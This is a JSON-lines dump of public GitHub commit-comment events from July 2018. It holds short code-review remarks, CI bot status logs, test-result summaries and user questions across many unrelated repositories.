{"id":"8007850809","type":"CommitCommentEvent","actor":{"login":"blag"},"repo":{"name":"nuxeo/watchdog3"},"payload":{"comment":{"id":29808941,"position":130,"line":631,"path":"src/watchdog/observers/kqueue.py","commit_id":"375b538b39fa925b91d97304c87479a7d1a2ce16","created_at":"2018-07-24T05:06:34Z","updated_at":"2018-07-24T05:06:34Z","author_association":"NONE","body":"The `path_for_inode` function is not defined on `DirectorySnapshot`, making tests OS X with the kqueue observer for PR #19 fail. 😬"}},"created_at":"2018-07-24T05:06:34Z"}
{"id":"8007854183","type":"CommitCommentEvent","actor":{"login":"nick-gorman"},"repo":{"name":"UNSW-CEEM/TDA"},"payload":{"comment":{"id":29808952,"position":null,"line":null,"path":null,"commit_id":"467fd44bebe3b0abbc93357ffb56fc15554fb710","created_at":"2018-07-24T05:07:59Z","updated_at":"2018-07-24T05:07:59Z","author_association":"NONE","body":"Hi"}},"created_at":"2018-07-24T05:07:59Z"}
{"id":"8007855172","type":"CommitCommentEvent","actor":{"login":"NECMASTER"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29808955,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T05:08:24Z","updated_at":"2018-07-24T05:08:24Z","author_association":"NONE","body":"Good Luck :)"}},"created_at":"2018-07-24T05:08:24Z"}
{"id":"8007858093","type":"CommitCommentEvent","actor":{"login":"MatthewFrench"},"repo":{"name":"LeagueSandbox/GameServer"},"payload":{"comment":{"id":29808961,"position":null,"line":null,"path":null,"commit_id":"793f7b11b6fe37a1934d7a3aa2aec558faf9583b","created_at":"2018-07-24T05:09:40Z","updated_at":"2018-07-24T05:09:40Z","author_association":"CONTRIBUTOR","body":"Fixed."}},"created_at":"2018-07-24T05:09:40Z"}
{"id":"8007858325","type":"CommitCommentEvent","actor":{"login":"rdeioris"},"repo":{"name":"20tab/UnrealEnginePython"},"payload":{"comment":{"id":29808962,"position":null,"line":null,"path":null,"commit_id":"c72703dee2f1f60cfae15388388be4575b3d1630","created_at":"2018-07-24T05:09:47Z","updated_at":"2018-07-24T05:09:47Z","author_association":"COLLABORATOR","body":"Hi, because it is the order used in blueprints. So the question would be: why epic uses two different styles :)"}},"created_at":"2018-07-24T05:09:47Z"}
{"id":"8007860407","type":"CommitCommentEvent","actor":{"login":"jjongyeonglee"},"repo":{"name":"gangnamjava/java-example"},"payload":{"comment":{"id":29808964,"position":null,"line":null,"path":null,"commit_id":"485f357042f361fed1a5f212dfe5292f1a033fac","created_at":"2018-07-24T05:10:38Z","updated_at":"2018-07-24T05:10:38Z","author_association":"CONTRIBUTOR","body":"오호, 자바에서는 가비지 컬렉터의 기본 탑재로 C, C++ 에서 쓰이는 free() 함수를 굳이 쓸 필요도 없고 메모리 관리에 신경을 좀 덜 써도 되는군요 :) \r\n이해 되기 쉽게 작성해주셔서 잘 모르고 넘어갔던 내용도 다시 이해했네요 "}},"created_at":"2018-07-24T05:10:38Z"}
{"id":"8007861078","type":"CommitCommentEvent","actor":{"login":"blag"},"repo":{"name":"nuxeo/watchdog3"},"payload":{"comment":{"id":29808966,"position":130,"line":631,"path":"src/watchdog/observers/kqueue.py","commit_id":"375b538b39fa925b91d97304c87479a7d1a2ce16","created_at":"2018-07-24T05:10:54Z","updated_at":"2018-07-24T05:10:54Z","author_association":"NONE","body":"Nevermind. The `path_for_inode` function was removed in 9c84dc5f37e361726c9f21d711b642f076c219cc; with a deprecation message \"Use :func:`path` instead.\" Looks like they missed this usage of it."}},"created_at":"2018-07-24T05:10:54Z"}
{"id":"8007861681","type":"CommitCommentEvent","actor":{"login":"tpruvot"},"repo":{"name":"fancyIX/sgminer-phi2-branch"},"payload":{"comment":{"id":29808968,"position":6,"line":59,"path":"algorithm/phi2.c","commit_id":"dc9c0f6eaf4d11283bd42d261b2ff33fc909fe93","created_at":"2018-07-24T05:11:08Z","updated_at":"2018-07-24T05:11:08Z","author_association":"NONE","body":"its bad"}},"created_at":"2018-07-24T05:11:08Z"}
{"id":"8007865404","type":"CommitCommentEvent","actor":{"login":"benwaffle"},"repo":{"name":"flathub/com.spotify.Client"},"payload":{"comment":{"id":29808974,"position":null,"line":null,"path":null,"commit_id":"0656805eb87c5594ac8459fbf6081366f544b549","created_at":"2018-07-24T05:12:35Z","updated_at":"2018-07-24T05:12:35Z","author_association":"NONE","body":"nice!"}},"created_at":"2018-07-24T05:12:35Z"}
{"id":"8007867595","type":"CommitCommentEvent","actor":{"login":"KevinWangT"},"repo":{"name":"stendro/msm8996_lge_kernel"},"payload":{"comment":{"id":29808979,"position":null,"line":null,"path":null,"commit_id":"8339b7d1b98ce9ad3fad303b8b74c062ccf52ee6","created_at":"2018-07-24T05:13:31Z","updated_at":"2018-07-24T05:13:31Z","author_association":"NONE","body":"Can I find the *boot.img* file in the latest .kdz file?  \r\nI'm using f800l now. So I'd like to see f880l being supported by this kernel.  \r\nI am a noob, but I'd like to make some efforts. :-）"}},"created_at":"2018-07-24T05:13:31Z"}
{"id":"8007871788","type":"CommitCommentEvent","actor":{"login":"Oves786"},"repo":{"name":"Exynos7870/android_vendor_samsung"},"payload":{"comment":{"id":29809000,"position":null,"line":null,"path":null,"commit_id":"9932a615f5dad3b6f0c8f8081165f7c0d09dabf4","created_at":"2018-07-24T05:15:09Z","updated_at":"2018-07-24T05:15:09Z","author_association":"CONTRIBUTOR","body":"chup bhdw#\n\nOn Wed, Jul 18, 2018 at 10:51 AM, Abhay Ruparel <notifications@github.com>\nwrote:\n\n> he moron\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Exynos7870/android_vendor_samsung/commit/9932a615f5dad3b6f0c8f8081165f7c0d09dabf4#commitcomment-29744202>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/Ac7w7zn21ivhFMygXJCPBl4rWi91zjadks5uHsXHgaJpZM4U9sBh>\n> .\n>\n"}},"created_at":"2018-07-24T05:15:09Z"}
{"id":"8007873906","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29809005,"position":null,"line":null,"path":null,"commit_id":"08525cb3fe29e6a17389ec024d8e65ba1a457718","created_at":"2018-07-24T05:15:55Z","updated_at":"2018-07-24T05:15:55Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-shs-filt](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-shs-filt).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-shs-filt-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-24T05:15:55Z"}
{"id":"8007879456","type":"CommitCommentEvent","actor":{"login":"maulanaku"},"repo":{"name":"Fruitfella/ROBOT-binary"},"payload":{"comment":{"id":29809018,"position":null,"line":null,"path":null,"commit_id":"de4b217c926a9ed6cd74045f92cc6d7dbc09be06","created_at":"2018-07-24T05:17:59Z","updated_at":"2018-07-24T05:17:59Z","author_association":"NONE","body":"gimana cara buat ngelink bot kefile ini ??"}},"created_at":"2018-07-24T05:17:59Z"}
{"id":"8007882553","type":"CommitCommentEvent","actor":{"login":"patricklonga"},"repo":{"name":"Microsoft/PQCrypto-SIDH"},"payload":{"comment":{"id":29809024,"position":null,"line":null,"path":null,"commit_id":"aae540fd26ebb87ca0a03739b6ed57630e1f0ac4","created_at":"2018-07-24T05:19:11Z","updated_at":"2018-07-24T05:19:11Z","author_association":"CONTRIBUTOR","body":"Added missing addition in a carry chain (Montgomery reduction function)."}},"created_at":"2018-07-24T05:19:11Z"}
{"id":"8007910654","type":"CommitCommentEvent","actor":{"login":"UC-KyeungseokKang"},"repo":{"name":"UC-KyeungseokKang/ML_for_basic"},"payload":{"comment":{"id":29809066,"position":null,"line":null,"path":null,"commit_id":"d5366133fe606719270e139acca0cf7bc1cfebaf","created_at":"2018-07-24T05:29:43Z","updated_at":"2018-07-24T05:29:43Z","author_association":"OWNER","body":"#fancy softmax\r\ntotal = 25192 \r\ntrue =17916\r\naccuracy=0.71\r\nfirst version. overfitting, normalization, activate fuction"}},"created_at":"2018-07-24T05:29:43Z"}
{"id":"8007913825","type":"CommitCommentEvent","actor":{"login":"patricklonga"},"repo":{"name":"Microsoft/PQCrypto-SIDH"},"payload":{"comment":{"id":29809076,"position":null,"line":null,"path":null,"commit_id":"ea9d54ab3fcd436e5887b52af4cd4210c92f1f6f","created_at":"2018-07-24T05:30:43Z","updated_at":"2018-07-24T05:30:43Z","author_association":"CONTRIBUTOR","body":"Added 64-bit ARMv8 assembly implementation of arithmetic functions for P503."}},"created_at":"2018-07-24T05:30:43Z"}
{"id":"8007914323","type":"CommitCommentEvent","actor":{"login":"thaitrungcoin"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29809079,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T05:30:54Z","updated_at":"2018-07-24T05:30:54Z","author_association":"NONE","body":"good"}},"created_at":"2018-07-24T05:30:54Z"}
{"id":"8007914661","type":"CommitCommentEvent","actor":{"login":"mirse"},"repo":{"name":"MiEcosystem/NewXmPluginSDK"},"payload":{"comment":{"id":29809081,"position":null,"line":null,"path":null,"commit_id":"9e0dd1d30b790031a5a94c205d77f9301d8e8cbc","created_at":"2018-07-24T05:31:01Z","updated_at":"2018-07-24T05:31:01Z","author_association":"NONE","body":"groupModel is？"}},"created_at":"2018-07-24T05:31:01Z"}
{"id":"8007916124","type":"CommitCommentEvent","actor":{"login":"VV888"},"repo":{"name":"stucco/auto-labeled-corpus"},"payload":{"comment":{"id":29809084,"position":null,"line":null,"path":null,"commit_id":"34f5448a7a312696809052545cc74b1e9e4aed10","created_at":"2018-07-24T05:31:30Z","updated_at":"2018-07-24T05:31:30Z","author_association":"NONE","body":"hey can you provide this files:\r\n1. MS Security Data/ :>Directory files.\r\n2. MS Security Data/MS_Security_Graphson_Files/'\r\n3. /MS_bulletin.train.graphson\r\n4. /MS_bulletin_w_tags.graphson\r\nin the corpus directory or make the new directory with MS Security Data and there."}},"created_at":"2018-07-24T05:31:30Z"}
{"id":"8007916192","type":"CommitCommentEvent","actor":{"login":"korli"},"repo":{"name":"Hrily/TrackGit"},"payload":{"comment":{"id":29809085,"position":null,"line":null,"path":null,"commit_id":"581c731134ce0dd70dca46778fc2ed1f6e1ba11d","created_at":"2018-07-24T05:31:31Z","updated_at":"2018-07-24T05:31:31Z","author_association":"NONE","body":"Please don't forget to add copyright headers for tests too!"}},"created_at":"2018-07-24T05:31:31Z"}
{"id":"8007917283","type":"CommitCommentEvent","actor":{"login":"AndrewJCallow"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29809088,"position":36,"line":36,"path":"contracts/SplitterUtility.sol","commit_id":"19438b2ecb97cb416709db96ebb199f6bcde1796","created_at":"2018-07-24T05:31:55Z","updated_at":"2018-07-24T05:31:55Z","author_association":"OWNER","body":"good point, i keep forgetting!"}},"created_at":"2018-07-24T05:31:55Z"}
{"id":"8007918254","type":"CommitCommentEvent","actor":{"login":"Kup1l"},"repo":{"name":"Kup1l/bot-billy"},"payload":{"comment":{"id":29809089,"position":null,"line":null,"path":null,"commit_id":"9bb13d28b32efee4bb9b457bc3653cfe57b85cdf","created_at":"2018-07-24T05:32:15Z","updated_at":"2018-07-24T05:32:15Z","author_association":"OWNER","body":"."}},"created_at":"2018-07-24T05:32:15Z"}
{"id":"8007923168","type":"CommitCommentEvent","actor":{"login":"quinci-dev[bot]"},"repo":{"name":"suchipi/test"},"payload":{"comment":{"id":29809093,"position":null,"line":null,"path":null,"commit_id":"f7f3c9ba83640f706918ac84adc675cc83b6019e","created_at":"2018-07-24T05:34:04Z","updated_at":"2018-07-24T05:34:04Z","author_association":"NONE","body":"🚫 quinCI run of 'master' was canceled."}},"created_at":"2018-07-24T05:34:04Z"}
{"id":"8007923971","type":"CommitCommentEvent","actor":{"login":"abhishesthapa"},"repo":{"name":"Genrationhaze/ISPM1"},"payload":{"comment":{"id":29809094,"position":null,"line":null,"path":null,"commit_id":"13f1e32ccb20a76a0d882806d11527e3449b3bed","created_at":"2018-07-24T05:34:21Z","updated_at":"2018-07-24T05:34:21Z","author_association":"COLLABORATOR","body":"Assessment Number 1\r\nAssessment Name Weekly viva in the workshop\r\nUnit Learning Outcomes\r\nAssessed\r\nLO1: Work effectively in a team to liaise with clients to determine system\r\nrequirements and elicit information necessary to create a software solution.\r\nDue Date and Time Week starting 09.07.2018\r\nWeighting 20%\r\nAssessment Description Viva on weekly workshop activities to ascertain progress in a timebound\r\nmanner. Not all students will be assessed each week. If your student id ends\r\nwith an even number, you will be assessed in even weeks. If not, you will be\r\nassessed in odd weeks.\r\nDetailed Submission\r\nRequirements\r\nThe assessment will be marked in the laboratory class by the tutor.\r\nFollow the instructions as required by this assessment brief.\r\nU"}},"created_at":"2018-07-24T05:34:21Z"}
{"id":"8007924568","type":"CommitCommentEvent","actor":{"login":"icubecorp"},"repo":{"name":"nvdla/sw"},"payload":{"comment":{"id":29809095,"position":null,"line":null,"path":null,"commit_id":"03e90a2e081c7b475088751cb609df31cb14ceb0","created_at":"2018-07-24T05:34:34Z","updated_at":"2018-07-24T05:34:34Z","author_association":"NONE","body":"We're trying to bring up nvlda on FPGA, but considering FPGA resource, we only could test small config. I got \"floating point exception\" error with lenet loadable convert by compiler. Doesn't compiler support small config now? And if yes, could your team give us an schedule? Thanks a lot."}},"created_at":"2018-07-24T05:34:34Z"}
{"id":"8007924696","type":"CommitCommentEvent","actor":{"login":"suchipi"},"repo":{"name":"suchipi/test"},"payload":{"comment":{"id":29809096,"position":null,"line":null,"path":null,"commit_id":"f7f3c9ba83640f706918ac84adc675cc83b6019e","created_at":"2018-07-24T05:34:37Z","updated_at":"2018-07-24T05:34:37Z","author_association":"OWNER","body":"quinci run master"}},"created_at":"2018-07-24T05:34:37Z"}
{"id":"8007924772","type":"CommitCommentEvent","actor":{"login":"quinci-dev[bot]"},"repo":{"name":"suchipi/test"},"payload":{"comment":{"id":29809097,"position":null,"line":null,"path":null,"commit_id":"f7f3c9ba83640f706918ac84adc675cc83b6019e","created_at":"2018-07-24T05:34:39Z","updated_at":"2018-07-24T05:34:39Z","author_association":"NONE","body":"🕑 quinCI will run 'master' once other 'master' jobs finish.\n"}},"created_at":"2018-07-24T05:34:39Z"}
{"id":"8007924795","type":"CommitCommentEvent","actor":{"login":"bradharding"},"repo":{"name":"bradharding/doomretro"},"payload":{"comment":{"id":29809099,"position":null,"line":null,"path":null,"commit_id":"3430e7d73e6cb3d84aa2b3bd233713f0891e2955","created_at":"2018-07-24T05:34:39Z","updated_at":"2018-07-24T05:34:39Z","author_association":"OWNER","body":"Oh well... I'm sure I'll find the cause eventually..."}},"created_at":"2018-07-24T05:34:39Z"}
{"id":"8007924798","type":"CommitCommentEvent","actor":{"login":"quinci-dev[bot]"},"repo":{"name":"suchipi/test"},"payload":{"comment":{"id":29809098,"position":null,"line":null,"path":null,"commit_id":"7f88fdd1827e489a7bd6ca427f893da60ea53ea1","created_at":"2018-07-24T05:34:39Z","updated_at":"2018-07-24T05:34:39Z","author_association":"NONE","body":"❌ quinCI run of 'master' failed. Exit code was 1.\n<details>\n<summary>Log output:</summary>\n\n``````\n+ echo 'Hi, running from master!!'\nHi, running from master!!\n+ sleep 61\n+ git rev-list --max-count=1 HEAD\n7f88fdd1827e489a7bd6ca427f893da60ea53ea1\n+ false\n``````\n</details>"}},"created_at":"2018-07-24T05:34:39Z"}
{"id":"8007924830","type":"CommitCommentEvent","actor":{"login":"quinci-dev[bot]"},"repo":{"name":"suchipi/test"},"payload":{"comment":{"id":29809100,"position":null,"line":null,"path":null,"commit_id":"f7f3c9ba83640f706918ac84adc675cc83b6019e","created_at":"2018-07-24T05:34:40Z","updated_at":"2018-07-24T05:34:40Z","author_association":"NONE","body":"🕑 quinCI is running 'master'...\n"}},"created_at":"2018-07-24T05:34:40Z"}
{"id":"8007927796","type":"CommitCommentEvent","actor":{"login":"quinci-dev[bot]"},"repo":{"name":"suchipi/test"},"payload":{"comment":{"id":29809108,"position":null,"line":null,"path":null,"commit_id":"f7f3c9ba83640f706918ac84adc675cc83b6019e","created_at":"2018-07-24T05:35:42Z","updated_at":"2018-07-24T05:35:42Z","author_association":"NONE","body":"✅ quinCI run of 'master' passed.\n<details>\n<summary>Log output:</summary>\n\n``````\n+ echo 'Hi, running from master!!'\n+ sleep 61\nHi, running from master!!\n+ git rev-list --max-count=1 HEAD\nf7f3c9ba83640f706918ac84adc675cc83b6019e\n``````\n</details>"}},"created_at":"2018-07-24T05:35:42Z"}
{"id":"8007929484","type":"CommitCommentEvent","actor":{"login":"robotcn"},"repo":{"name":"nvdla/sw"},"payload":{"comment":{"id":29809115,"position":null,"line":null,"path":null,"commit_id":"03e90a2e081c7b475088751cb609df31cb14ceb0","created_at":"2018-07-24T05:36:18Z","updated_at":"2018-07-24T05:36:18Z","author_association":"NONE","body":"We're trying to bring up nvlda on FPGA, but considering FPGA resource, we only could test small config. I got \"floating point exception\" error with lenet loadable convert by compiler. Doesn't compiler support small config now? And if yes, could your team give us an schedule? Thanks a lot."}},"created_at":"2018-07-24T05:36:18Z"}
{"id":"8007932457","type":"CommitCommentEvent","actor":{"login":"AndrewJCallow"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29809119,"position":35,"line":35,"path":"contracts/SplitterUtility.sol","commit_id":"19438b2ecb97cb416709db96ebb199f6bcde1796","created_at":"2018-07-24T05:37:20Z","updated_at":"2018-07-24T05:37:20Z","author_association":"OWNER","body":"Yep that makes sense."}},"created_at":"2018-07-24T05:37:20Z"}
{"id":"8007932465","type":"CommitCommentEvent","actor":{"login":"duncte123"},"repo":{"name":"DuncteBot/SkyBot"},"payload":{"comment":{"id":29809120,"position":17,"line":126,"path":"src/main/java/ml/duncte123/skybot/objects/command/Command.java","commit_id":"9152237b7660ece084f343bd15f09b8869645666","created_at":"2018-07-24T05:37:21Z","updated_at":"2018-07-24T05:37:21Z","author_association":"MEMBER","body":"Or just set the text channel to null?"}},"created_at":"2018-07-24T05:37:21Z"}
{"id":"8007932803","type":"CommitCommentEvent","actor":{"login":"WangNianyi2001"},"repo":{"name":"WangNianyi2001/Nianyi-s-JavaScript-Library"},"payload":{"comment":{"id":29809123,"position":71,"line":81,"path":"Nianyi.js","commit_id":"e952b0f8ac424f1bd9442e0c89172879a0a60a35","created_at":"2018-07-24T05:37:28Z","updated_at":"2018-07-24T05:37:28Z","author_association":"OWNER","body":"A more standard way to set the value."}},"created_at":"2018-07-24T05:37:28Z"}
{"id":"8007934479","type":"CommitCommentEvent","actor":{"login":"WangNianyi2001"},"repo":{"name":"WangNianyi2001/Nianyi-s-JavaScript-Library"},"payload":{"comment":{"id":29809125,"position":10,"line":10,"path":"Nianyi.js","commit_id":"e952b0f8ac424f1bd9442e0c89172879a0a60a35","created_at":"2018-07-24T05:38:06Z","updated_at":"2018-07-24T05:38:06Z","author_association":"OWNER","body":"Above are the extracted functions."}},"created_at":"2018-07-24T05:38:06Z"}
{"id":"8007935082","type":"CommitCommentEvent","actor":{"login":"WangNianyi2001"},"repo":{"name":"WangNianyi2001/Nianyi-s-JavaScript-Library"},"payload":{"comment":{"id":29809126,"position":14,"line":14,"path":"Nianyi.js","commit_id":"e952b0f8ac424f1bd9442e0c89172879a0a60a35","created_at":"2018-07-24T05:38:20Z","updated_at":"2018-07-24T05:38:20Z","author_association":"OWNER","body":"Unpacking."}},"created_at":"2018-07-24T05:38:20Z"}
{"id":"8007935983","type":"CommitCommentEvent","actor":{"login":"chaos0972"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29809130,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T05:38:39Z","updated_at":"2018-07-24T05:38:39Z","author_association":"NONE","body":"good project~!!!!"}},"created_at":"2018-07-24T05:38:39Z"}
{"id":"8007936786","type":"CommitCommentEvent","actor":{"login":"duncte123"},"repo":{"name":"DuncteBot/SkyBot"},"payload":{"comment":{"id":29809131,"position":6,"line":37,"path":"src/main/kotlin/ml/duncte123/skybot/commands/music/PlayCommand.kt","commit_id":"1c2597cbfde79de1466ba73057bd461cc216520b","created_at":"2018-07-24T05:38:55Z","updated_at":"2018-07-24T05:38:55Z","author_association":"MEMBER","body":"Do this for the pplay and playrw command as well"}},"created_at":"2018-07-24T05:38:55Z"}
{"id":"8007939415","type":"CommitCommentEvent","actor":{"login":"WangNianyi2001"},"repo":{"name":"WangNianyi2001/Nianyi-s-JavaScript-Library"},"payload":{"comment":{"id":29809136,"position":16,"line":16,"path":"Nianyi.js","commit_id":"e952b0f8ac424f1bd9442e0c89172879a0a60a35","created_at":"2018-07-24T05:39:48Z","updated_at":"2018-07-24T05:39:48Z","author_association":"OWNER","body":"Execute `Object.protoype.toString` on `null` will cause an error, thus we filter them out before furthermore judgement."}},"created_at":"2018-07-24T05:39:48Z"}
{"id":"8007940149","type":"CommitCommentEvent","actor":{"login":"tbrandel"},"repo":{"name":"tbrandel/RepData_PeerAssessment1"},"payload":{"comment":{"id":29809137,"position":null,"line":null,"path":null,"commit_id":"ed1c5e4cef9e6ad55128b58994f414ab63dfa70b","created_at":"2018-07-24T05:39:59Z","updated_at":"2018-07-24T05:39:59Z","author_association":"OWNER","body":"Removing a couple of empty lines"}},"created_at":"2018-07-24T05:39:59Z"}
{"id":"8007940225","type":"CommitCommentEvent","actor":{"login":"casz"},"repo":{"name":"jdalrymple/node-gitlab"},"payload":{"comment":{"id":29809139,"position":null,"line":null,"path":null,"commit_id":"f4f1aeefd1d3bb2d400dbc12cc570278c45ba63e","created_at":"2018-07-24T05:40:00Z","updated_at":"2018-07-24T05:40:00Z","author_association":"CONTRIBUTOR","body":"@jdalrymple I think you have to parse the output as well for the statuses 👍 They have to be all OK"}},"created_at":"2018-07-24T05:40:00Z"}
{"id":"8007942223","type":"CommitCommentEvent","actor":{"login":"WangNianyi2001"},"repo":{"name":"WangNianyi2001/Nianyi-s-JavaScript-Library"},"payload":{"comment":{"id":29809143,"position":19,"line":19,"path":"Nianyi.js","commit_id":"e952b0f8ac424f1bd9442e0c89172879a0a60a35","created_at":"2018-07-24T05:40:40Z","updated_at":"2018-07-24T05:40:40Z","author_association":"OWNER","body":"Getting the 'real' type."}},"created_at":"2018-07-24T05:40:40Z"}
{"id":"8007943211","type":"CommitCommentEvent","actor":{"login":"ziouz"},"repo":{"name":"leblancfg/autocrop"},"payload":{"comment":{"id":29809147,"position":24,"line":19,"path":"autocrop/autocrop.py","commit_id":"1748fee7951e936a2de7a799225e4f28a19d02bb","created_at":"2018-07-24T05:41:03Z","updated_at":"2018-07-24T05:41:03Z","author_association":"NONE","body":"can there be a command so that there would be an adjustable space around the face area"}},"created_at":"2018-07-24T05:41:03Z"}
{"id":"8007947038","type":"CommitCommentEvent","actor":{"login":"WangNianyi2001"},"repo":{"name":"WangNianyi2001/Nianyi-s-JavaScript-Library"},"payload":{"comment":{"id":29809167,"position":33,"line":33,"path":"Nianyi.js","commit_id":"e952b0f8ac424f1bd9442e0c89172879a0a60a35","created_at":"2018-07-24T05:42:26Z","updated_at":"2018-07-24T05:42:26Z","author_association":"OWNER","body":"Here for date & boolean values."}},"created_at":"2018-07-24T05:42:26Z"}
{"id":"8007947283","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"energy-plus/EnergyPlus"},"payload":{"comment":{"id":29809169,"position":null,"line":null,"path":null,"commit_id":"fc1b41bea3db8faffec69bf84e79a557a8c8127a","created_at":"2018-07-24T05:42:31Z","updated_at":"2018-07-24T05:42:31Z","author_association":"NONE","body":"CoilHackathonBranch1 (energy-plus) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2965 of 2988 tests passed, 17 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 21 tests had: Table big diffs.\n * 5 tests had: EIO diffs.\n * 2 tests had: ERR diffs.\n * 4 tests had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 4 tests had: MTR small diffs.\n * 2 tests had: Table small diffs.\n * 5 tests had: ESO small diffs.\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 657\n * Failed: 1\n\nregression Test Summary\n * Passed: 621\n * Failed: 22\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fc1b41bea3db8faffec69bf84e79a557a8c8127a-PR6846-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fc1b41bea3db8faffec69bf84e79a557a8c8127a-PR6846-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.23%25-yellow.png)</a> \n"}},"created_at":"2018-07-24T05:42:31Z"}
{"id":"8007949034","type":"CommitCommentEvent","actor":{"login":"sdroege"},"repo":{"name":"sdroege/gst-plugin-threadshare"},"payload":{"comment":{"id":29809177,"position":13,"line":111,"path":"tests/tcpclientsrc.rs","commit_id":"ff5ee395009e1712a06b67031d7994d08fd08dbd","created_at":"2018-07-24T05:43:09Z","updated_at":"2018-07-24T05:43:09Z","author_association":"OWNER","body":"The source element itself should send an EOS event (not message) downstream when the connection is closed. Then you'll get an EOS message automatically from the sink once all is done"}},"created_at":"2018-07-24T05:43:09Z"}
{"id":"8007949521","type":"CommitCommentEvent","actor":{"login":"WangNianyi2001"},"repo":{"name":"WangNianyi2001/Nianyi-s-JavaScript-Library"},"payload":{"comment":{"id":29809180,"position":28,"line":28,"path":"Nianyi.js","commit_id":"e952b0f8ac424f1bd9442e0c89172879a0a60a35","created_at":"2018-07-24T05:43:21Z","updated_at":"2018-07-24T05:43:21Z","author_association":"OWNER","body":"Considered that `+0` shouldn't be equal with `-0`, and `NaN` **should** be equal with itself."}},"created_at":"2018-07-24T05:43:21Z"}
{"id":"8007950613","type":"CommitCommentEvent","actor":{"login":"yasker"},"repo":{"name":"rancher/longhorn-ui"},"payload":{"comment":{"id":29809182,"position":5,"line":11,"path":"src/routes/volume/detail/VolumeInfo.js","commit_id":"9ee3646dca5f05c013f5d2c32df7df7f62d84efe","created_at":"2018-07-24T05:43:44Z","updated_at":"2018-07-24T05:43:44Z","author_association":"MEMBER","body":"Is it possible to use the same function defined above? I don't know about js though it looks like duplicated code logic."}},"created_at":"2018-07-24T05:43:44Z"}
{"id":"8007950939","type":"CommitCommentEvent","actor":{"login":"sdroege"},"repo":{"name":"sdroege/gst-plugin-threadshare"},"payload":{"comment":{"id":29809183,"position":13,"line":111,"path":"tests/tcpclientsrc.rs","commit_id":"ff5ee395009e1712a06b67031d7994d08fd08dbd","created_at":"2018-07-24T05:43:52Z","updated_at":"2018-07-24T05:43:52Z","author_association":"OWNER","body":"It should also never produce 0 byte buffers"}},"created_at":"2018-07-24T05:43:52Z"}
{"id":"8007951385","type":"CommitCommentEvent","actor":{"login":"AndrewJCallow"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29809185,"position":37,"line":37,"path":"contracts/SplitterUtility.sol","commit_id":"19438b2ecb97cb416709db96ebb199f6bcde1796","created_at":"2018-07-24T05:44:02Z","updated_at":"2018-07-24T05:44:02Z","author_association":"OWNER","body":"That's much better. Intent more obvious."}},"created_at":"2018-07-24T05:44:02Z"}
{"id":"8007952029","type":"CommitCommentEvent","actor":{"login":"WangNianyi2001"},"repo":{"name":"WangNianyi2001/Nianyi-s-JavaScript-Library"},"payload":{"comment":{"id":29809186,"position":37,"line":37,"path":"Nianyi.js","commit_id":"e952b0f8ac424f1bd9442e0c89172879a0a60a35","created_at":"2018-07-24T05:44:15Z","updated_at":"2018-07-24T05:44:15Z","author_association":"OWNER","body":"All functions with different references are considered **not** equal."}},"created_at":"2018-07-24T05:44:15Z"}
{"id":"8007955559","type":"CommitCommentEvent","actor":{"login":"Unclevinny"},"repo":{"name":"m1ndgames/sc2ladderobserver"},"payload":{"comment":{"id":29809197,"position":null,"line":null,"path":null,"commit_id":"6b41a8740316beb451485462693bd098cc3ad81e","created_at":"2018-07-24T05:45:32Z","updated_at":"2018-07-24T05:45:32Z","author_association":"NONE","body":"Did this commit make the screen size on the Twitch stream smaller? I don't see how it would have, but that's around the time that the game screen shrank to about 40% of its normal size.\r\n\r\nI see that you're pressing D here, which should show the production tab, but it's usually not showing on stream. \r\nAlso... if you click \"Control-N\"  would it show the player names? "}},"created_at":"2018-07-24T05:45:32Z"}
{"id":"8007956482","type":"CommitCommentEvent","actor":{"login":"WangNianyi2001"},"repo":{"name":"WangNianyi2001/Nianyi-s-JavaScript-Library"},"payload":{"comment":{"id":29809199,"position":39,"line":39,"path":"Nianyi.js","commit_id":"e952b0f8ac424f1bd9442e0c89172879a0a60a35","created_at":"2018-07-24T05:45:51Z","updated_at":"2018-07-24T05:45:51Z","author_association":"OWNER","body":"For arrays, we simply compare the equality of their elements."}},"created_at":"2018-07-24T05:45:51Z"}
{"id":"8007957554","type":"CommitCommentEvent","actor":{"login":"rapgro"},"repo":{"name":"andreikop/enki"},"payload":{"comment":{"id":29809204,"position":null,"line":null,"path":null,"commit_id":"2433dfa1e706551c7c89106f4955e5172eb67279","created_at":"2018-07-24T05:46:13Z","updated_at":"2018-07-24T05:46:13Z","author_association":"NONE","body":"Nice! Please provide a new release and I'll build and provide an update in Fedora."}},"created_at":"2018-07-24T05:46:13Z"}
